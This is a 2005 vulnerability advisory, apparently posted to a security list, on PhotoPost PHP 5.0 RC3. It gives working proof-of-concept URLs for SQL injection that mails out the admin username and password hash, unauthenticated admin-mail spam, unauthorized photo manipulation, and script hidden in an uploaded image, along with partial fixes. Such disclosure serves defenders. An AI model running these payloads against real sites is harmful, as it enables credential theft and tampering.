PhotoPost PHP 5.0 RC3, and later, multiple vulnerabilities
PhotoPost 5.0RC3, All Enthusiast, Inc, multiple vulnerabilities
March 05 2005
For your consideration.
1. BACKGROUND
PhotoPost is a popular commercial image publishing software.
Everyone loves showing off their photos! Add PhotoPost to your site, or
let us install it for you,
and your visitors will be able to upload their photos to galleries on your
site and interact in photo
discussions. Join the 3,500+ sites that are already using PhotoPost and
add a fun new dimension to your website.
....
Yeah, it is just that bad.
2. IMPACT
A series of vulnerabilities allows a remote attacker
- to get arbitrary data from photopost tables (*)
- to spam administrator mailbox
- to steal sessions
- to manipulate photographs
- TO XSS PhotoPost
(*) under some configuration, I will describe it in details
later
- to upload "image" files with arbitrary content
3. SEVERITY
HIGH
4. ANALYSIS
4.1 GETTING ARBITRARY DATA FROM PHOTOPOST TABLES
PhotoPost (further on - PP) is built on a highly risky principle
of filtering input data, based on magic_quotes:
=------
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie)
operations.
When magic_quotes are on, all ' (single-quote), " (double
quote), \ (backslash) and NUL's are escaped with a backslash automatically.
=------
Turning magic_quotes on is neglected by a large percentage of PP
users.
It is a good idea not to rely on user interaction in the essential
matter of
data filtering and write nested procedures based on on the
mysql_escape_string/mysql_real_escape_string
functions instead. Adding a few native strings of code would have
definitely
fixed that "human" factor.
Many users do not have any idea what magic_quotes is and
what it is for and what their negligence will lead them to, even
despite a
warning PP gives while installing. If one were to
look into architecture PP is assembled upon, it would become clear
that PP should even not attempt to install itself on systems with
magic_quotes turned off.
PROOF of CONCEPT
To see whether PP is running in the environment with magic quotes
turned off one might use the following URL:
http://photopost.hosting.site/photopost/member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","yourmail@xxxxxxxxx",%20concat(username,"%20",%20password)%20from%20users
no login required
* replace yourmail@xxxxxxxxx for your email. If the magic
quotes turned off you'll get admin MD5 hash and user name on your
mail.
* this URL might not work out if the site has an old mySQL version
=---
UNION is used to combine the result from many SELECT statements
into one result set. UNION is available from MySQL 4.0.0 on
.....
=---
UNION is the only way to effectively exploit PHP based
queries, due to the security mysql_query provides. It was
clever of PHP developers not to allow multiple queries
divided by ';'
QUICK FIX
.htaccess
php_value magic_quotes_gpc 1
4.2 CODING NEGLIGENCE
Analysis of the query (I) leads only to another security
issue with PP. It has plenty unsafe requests like
"SELECT joindate,email,username FROM {$Globals['pp_db_prefix']}users
WHERE userid=$uid"
Notice the fact database field userid is compared with
$uid. $uid is supplied by the user and thereby it's content
is arbitrary and still there is no quotes, no is_alpha,
intval check, nothing of the kind. Looking at the code in
random shows that, from time to time, PP is doing the
checking but the rule is not universal.
Even if the magic_quotes were turned on it might be possible
to devise a query that could pass, one way or another
through and get data posted on your mail anyway. But, the
example query (I) won't do it. It just constructed to pass through
several conditions that stands before 'send' is invoked.
QUICK FIX
1).htaccess
php_value magic_quotes_gpc 1
It will at least make it more difficult
4.3 SPAMING ADMINISTRATOR MAILBOX WITH ARBITRARY CONTENT
PP doesn't always check if the user is authorized. Though,
as in this particular case, three is a login attempt, it
won't interact with it's status.
The other problem is that PP absolutely doesn't care how
much events were served, say - mail sending, how often,
or how much authorization attempts were done, it is kind of
a lack of policy, combined it could lead to spam.
PROOF of CONCEPT
http://photopost.hosting.site/photopost/misc.php?action=reportpost&report=1&final=1
no login required
using this URL one may spam administrator email with
arbitrary number of letters and PP won't even try to stop it
QUICK FIX
adding
if ($User['userid'] == "") {
diewell( $Globals['pp_lang']['noreg'] );
}
after authenticate() is invoked. in the if($action =
"reportpost") section should fix the problem with
unauthorized users.
But it won't fix the problem in general, anyone who is
authorized will be able to spam administrator.
4.4 MANIPULATING USER PHOTOGRAPHS
The problem is related to adm-photo.php, despite all the rest
administrator scripts it doesn't require "adm-inc.php".
adm-inc.php has a built-in check that won't allow anybody
except administrator to pass further. That fact opens the
door to the set of administrator functions built into
adm-photo.php for everyone.
As an example I decided to construct URL that would
rebuild thumbnails for a picture with a given PID (in our case
it is 1), namely - it will rotate it clockwise.
ROOF of CONCEPT
http://photopost.hosting.site/photopost/adm-photo.php?ppaction=manipulate&pid=1&dowhat=rebuildthumb&dowhat=rotateccw
no login required
I'm not sure it is not one of the "features" but it looks like
no one but admin should be allowed to to this job.
QUICK FIX
I believe adding
require "adm-inc.php";
will solve the problem.
4.5 INSERTING ARBITRARY HTML CODE
XSS1
And finally, there is CSS in the PP.
function check_tags($data, $allowed){
$data = preg_replace("/<(.*?)>/e",
"process_tag(stripslashes('\\1'), \$allowed)",
$data);
$data = str_replace('javascript:','#',$data);
return $data;
}
I won't comment it. This is a very, very bad habit to check
javascript:
In short, it is possible to form data the way PP will upload
a given URL. Then it will "check" javascript using this lame
rule.
XSS2
PP doesn't check biography field 'editbio' in the user profile,
so, it can easily contain any arbitrary HTML code, tags,
javascript, when the personal information is viewed it
the session might be stolen.
QUICK FIX
None
4.6 UPLOADING IMAGES WITH ARBITRARY CONTENT
PP allows to upload any file disguised as an image. It
neither performs check of the file nor it tries to trim it
to some internal standard. Basically one uploads JS as an
image into PP then spreads a DIRECT link on the uploaded
image. IE will execute JS from a broken image transparently.
PROOF OF CONCEPT
injected.gif
<script>
document.write('<img
src=http://www.microsoft.com/h/en-us/i/ts_1024_25_BillGWebcastB.jpg>');
alert('Injected');
</script>
PP SHOULD load 'as a picture; and then, in case of success,
save as a pictur' all the uploaded images to guarantee that
file content is at least image/gif.
QUICK FIX
None
5. VENDOR STATUS
Informed a week ago by mail. With no response.
Next time, if I have time to explore sources again, I'll not inform this
particular vendor. When this article was posted in the private PP forum
it was removed almost immediately.
Today I've got a letter (not personal) about a new 5.01 release. When
looking in the fixed files I saw that it really fixes some issues with PP,
that were described in this article. Especially the e-mail bypass
will not work in 5.01 under no condition.
I believe you may easily find the vulnerable versions, as well as
some of the source codes :-) with google.com
--
Best regards